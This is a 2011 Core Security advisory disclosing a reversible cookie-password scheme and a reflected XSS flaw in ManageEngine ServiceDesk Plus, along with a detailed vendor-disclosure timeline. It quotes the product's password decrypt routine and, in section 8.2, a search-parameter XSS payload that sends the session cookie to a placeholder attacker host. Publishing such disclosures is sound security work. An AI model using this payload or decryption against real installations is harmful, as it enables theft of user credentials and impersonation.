Core Security Technologies Advisory 2011.0506

`Core Security - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
Multiples Vulnerabilities in ManageEngine ServiceDesk Plus  
  
  
1. *Advisory Information*  
  
Title: Multiples Vulnerabilities in ManageEngine ServiceDesk Plus  
Advisory ID: CORE-2011-0506  
Advisory URL:  
http://www.coresecurity.com/content/multiples-vulnerabilities-manageengine-sdp  
Date published: 2011-09-14  
Date of last update: 2011-09-14  
Vendors contacted: ManageEngine  
Release mode: User release  
  
  
2. *Vulnerability Information*  
  
Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]  
Impact: Code execution, Security bypass  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2011-1509, CVE-2011-1510  
  
  
3. *Vulnerability Description*  
  
ManageEngine ServiceDesk Plus is a complete web based and ITIL ready  
service desk software with integrated asset management developed by  
ManageEngine, the Enterprise IT Management Software division of Zoho  
Corporation [1].  
  
The authentication process of ServiceDesk Plus obfuscates user passwords  
using a trivial and symmetrical algorithm in Javascript code with no  
secret. Given that user passwords are locally stored in user cookies and  
having the Javascript code to encrypt and decrypt passwords in a .js  
file , the authentication process of ServiceDesk Plus can be bypassed  
allowing an attacker to get usernames+passwords of registered users.  
  
Additionally, a cross site scripting vulnerability related to search  
functions was found.  
  
  
4. *Vulnerable packages*  
  
. ManageEngine ServiceDesk Plus 8.0.0 Professional edition.  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. Contact vendor for further information.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
Regarding the vulnerability issue in 'SearchSolution' page  
[CVE-2011-1510], the SDP team has identified this vulnerability  
[2011-05-16] and it was fixed in SDP 8012, June 2011. ManageEngine did  
not provide technical information, workaround nor a clear timeline for  
fixes regarding [CVE-2011-1509]. Please, contact vendor for further  
information and patches.  
  
  
7. *Credits*  
  
This vulnerability was discovered and researched by Matias Blanco from  
Core Security Technologies.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
8.1. *Authentication Weakness*  
  
[CVE-2011-1509] User passwords are pseudo encrypted and locally stored  
in user cookies. This encryption is symmetrical using Caesar Cipher with  
no salt or secret, having the Javascript code encrypt and decrypt  
passwords in 'Login.js' file.  
  
/-----  
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */  
...  
12  
13 function encryptPassword(textPassword)  
14 {  
15 var num_out = "";  
16 var str_in = escape(textPassword);  
17 for(i = 0; i < str_in.length; i++)  
18 {  
19 num_out += str_in.charCodeAt(i) - 23;  
20 }  
21 return num_out;  
22 }  
23  
  
-----/  
  
  
/-----  
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */  
...  
23  
24 function decryptPassword(encPassword)  
25 {  
26 var str_out = "";  
27 var num_out = encPassword;  
28 for(i = 0; i < num_out.length; i += 2)  
29 {  
30 num_in = parseInt(num_out.substr(i,[2])) + 23;  
31 num_in = unescape('%' + num_in.toString(16));// No I18N  
32 str_out += num_in;  
33 }  
34 var textPassword = unescape(str_out);  
35 return textPassword ;  
36 }  
37  
  
-----/  
So, if the attacker succeeded in trying to steal the cookie, he can  
easily decrypt it and get the original password. Given that the username  
is also stored in plaintext in the cookie, this can lead to  
impersonation and identity theft.  
  
  
8.2. *Cross-Site Scripting*  
  
[CVE-2011-1510] There is a lack of sanitization in the 'searchText'  
parameter located in the 'SolutionSearch.do' page. An external attacker  
can obtain the password of an authenticated ManageEngine user by making  
this request:  
  
/-----  
https://[vulnerable_site]/SolutionSearch.do?searchText=';var  
el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);'  
-----/  
  
This request performs an HTTP request to a webserver controlled by the  
attacker, 'http://[malicious_site]', sending the cookie that includes  
the predictable password.  
  
  
9. *Report Timeline*  
  
. 2011-05-12:  
Initial notification to the vendor. Publication date set to June 7th, 2011.  
  
. 2011-05-13:  
The Service Desk team asks Core for a technical description of the  
vulnerability.  
  
. 2011-05-13:  
Technical details sent to Service Desk team.  
  
. 2011-05-16:  
The Service Desk team notifies they are analyzing the [CVE-2011-1509]  
issue and it will take them some time to fix it. The issue  
[CVE-2011-1510] was identified and it will be fixed in SDP 8012, which  
is expected by the end of May 2011.  
  
. 2011-05-23:  
Core requests to clarify whether the problems will be released  
altogether or in two release cycles.  
  
. 2011-05-27:  
The Service Desk team notifies the issue [CVE-2011-1510] will be fixed  
in the upcoming hotfix 8012, which is currently under validation phase  
and is expected to get released by next week. Regarding the encryption  
issue [CVE-2011-1509], the Service Desk team notifies they will have to  
work on that and will not be able to provide a fix by June 7th 2011.  
  
. 2011-06-02:  
Core states that neither the progress status nor the release date for  
the fix of [CVE-2011-1509] have been notified. Core also claims that the  
advisory publication was rescheduled to Jun 21st, and requests a clear  
timeline.  
  
. 2011-06-07:  
The Service Desk team notifies that they have not been working on this  
issue. Once the next product release is over they will get started on  
the analysis.  
  
. 2011-06-07:  
First release date missed.  
  
. 2011-06-21:  
Second release date missed.  
  
. 2011-06-23:  
Core notifies that the vulnerability was reported 5 weeks ago  
[2011-05-12], 2 release dates were already missed, and requests an  
update on the status as soon as possible in order to assess the situation.  
  
. 2011-07-08:  
Core notifies that is not possible to keep the process coordinated  
without the requested information and reschedules the advisory to be  
published on July 19th as 'User Release'.  
  
. 2011-07-08:  
The Service Desk team notifies that they have started analyzing  
[CVE-2011-1509] and working on various solutions to get this fixed. The  
vendor also notifies that they will try to roll the patches on the 8.1  
release, which is expected in 2 months' time from now.  
  
. 2011-07-18:  
Core considers bad practice to postpone the patch release 2 months until  
a new version of the product is available (since it may suffer  
engineering delays that have nothing to do with the reported security  
issue itself). As a result, Core offers to reschedule the advisory  
publication to Aug 9th, providing additional time to the vendor for  
developing patches and/or the appropriate mitigation actions, until the  
version 8.1 comes to light.  
  
. 2011-07-19:  
Third release date missed.  
  
. 2011-08-08:  
Core requests a status update and notifies the advisory is currently  
scheduled to be published tomorrow, Aug 9th. Core also requests to  
clarify if the vendor will release fixes for previous vulnerable  
versions of ManageEngine.  
  
. 2011-08-09:  
Manage Engine team notifies they have not fixed the issue yet and  
customers will have to upgrade to the latest version to get a fixed  
version of the product.  
  
. 2011-08-09:  
Fourth release date missed.  
  
. 2011-08-12:  
Core notifies that the release date was missed and requests to clarify a  
new estimated date for disclosure. Core also requests additional  
technical information regarding the fix and how Manage Engine team is  
going to resolve the weakness in the authentication process. Core also  
requests to clarify if customers of old versions will have to pay for  
the latest (patched) version or they will be able to download free patches.  
  
. 2011-08-16:  
Manage Engine team notifies that there could be a delay of about a month  
for a release candidate; technical details will be released once they  
decide on the final implementation. Vendor also notifies that the  
upgrade from a earlier version to a new version is free. A patch will be  
available in the site for the upgrades.  
  
. 2011-08-18:  
Core notifies that given:  
1. this flaw was reported 3 months ago [2011-05-12],  
2. 4th release dates were already missed,  
3. SDP is postponing the release of patch until a new version of the  
product is available,  
4. and the lack of technical information about how and when SDP will  
patch this flaw;  
  
Core has decided to re-schedule the advisory to Sep 13th and this  
should be considered as a final date.  
  
. 2011-09-14:  
CORE-2011-0506 is published.  
  
  
10. *References*  
  
[1] ManageEngine ServiceDesk Plus  
http://www.manageengine.com/products/service-desk.  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://corelabs.coresecurity.com.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies enables organizations to get ahead of threats  
with security test and measurement solutions that continuously identify  
and prove real-world exposures to their most critical assets. Our  
customers can gain real visibility into their security standing, real  
validation of their security controls, and real metrics to more  
effectively secure their organizations.  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
Technologies can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2011 Core Security  
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
  
`